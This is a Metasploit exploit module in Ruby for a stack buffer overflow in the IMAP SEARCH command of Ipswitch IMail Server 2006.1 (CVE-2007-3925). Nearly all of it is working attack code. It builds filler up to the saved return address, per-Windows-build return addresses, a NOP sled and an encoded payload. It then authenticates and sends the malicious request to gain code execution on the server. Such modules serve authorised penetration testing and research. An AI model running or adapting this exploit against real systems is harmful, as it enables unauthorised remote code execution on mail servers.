GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/imap/ipswitch_search.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
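class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Imap

  # Bytes of filler between the start of the SEARCH BEFORE argument and the
  # saved return address on the stack (taken from the original module).
  RET_OFFSET = 87

  # Length of the NOP sled placed between the return address and the payload.
  NOP_SLED_LEN = 20

  # Module metadata: vulnerable product, references, payload constraints and
  # the per-OS return addresses used to redirect execution.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Ipswitch IMail IMAP SEARCH Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH
        verb. By sending an overly long string, an attacker can overwrite the
        buffer and control program execution.
        In order for this module to be successful, the IMAP user must have at least one
        message.
      },
      'Author' => [ 'MC' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2007-3925' ],
          [ 'OSVDB', '36219' ],
          [ 'BID', '24962' ],
        ],
      # The IMAP service is assumed to run with elevated rights, so a session
      # is expected to be privileged -- not verified in this module.
      'Privileged' => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload' =>
        {
          'Space' => 400,
          # NUL plus the IMAP line/argument delimiters (LF, CR, space, VT,
          # TAB, FF); any of these would cut the SEARCH argument short.
          'BadChars' => "\x00\x0a\x0d\x20\x0b\x09\x0c",
          # Decodes to `add esp, -0x1001 ; inc esp` (net esp -= 0x1000),
          # moving the stack pointer away from the buffer so the decoder's
          # stack writes do not land on the payload being decoded.
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform' => 'win',
      # 'Ret' is the address written over the saved return address; presumably
      # an ESP-relative trampoline in a system DLL for that OS build -- not
      # verified here, so these targets are build/language specific.
      'Targets' =>
        [
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77f81be3 } ],
          [ 'Windows 2003 SP0 English', { 'Ret' => 0x77c5cee8 } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2007-07-18'))
  end

  # Builds the malicious SEARCH BEFORE argument, authenticates, selects INBOX
  # and sends the request. Fails with Failure::NoAccess when the IMAP login
  # does not succeed, since the overflow is only reachable post-login.
  def exploit
    # Layout: filler up to the saved return address, the target return address
    # (little-endian), a short NOP sled, then the encoded payload. The whole
    # thing is wrapped in "<...>" so the server treats it as one argument.
    buf = ''
    buf << rand_text_english(RET_OFFSET)
    buf << [target.ret].pack('V')
    buf << make_nops(NOP_SLED_LEN)
    buf << payload.encoded
    request = "a002 SEARCH BEFORE <#{buf}>"

    # connect_login (Imap mixin) is truthy only after a successful LOGIN.
    # The original module still started the handler on a failed login, which
    # just idles waiting for a session that cannot arrive; bail out instead.
    unless connect_login
      disconnect
      fail_with(Failure::NoAccess, 'IMAP login failed; check the IMAP credentials')
    end

    print_status("Trying target #{target.name}...")
    sock.put("a001 SELECT INBOX\r\n")
    select_resp = sock.get_once(-1, 3)

    # Per the module description the overflow is only reached when the
    # mailbox holds at least one message. A SELECT response carries a
    # "* N EXISTS" line (RFC 3501); warn when it visibly reports zero so a
    # silent no-op is not mistaken for a non-vulnerable target. The read is
    # best-effort (3s timeout) and may be partial, so absence of the line is
    # not treated as an error.
    if select_resp && select_resp =~ /\*\s+0\s+EXISTS/
      print_warning('INBOX reports 0 messages; the vulnerable SEARCH path is not reached on an empty mailbox')
    end

    sock.put(request + "\r\n")

    handler
    disconnect
  end
end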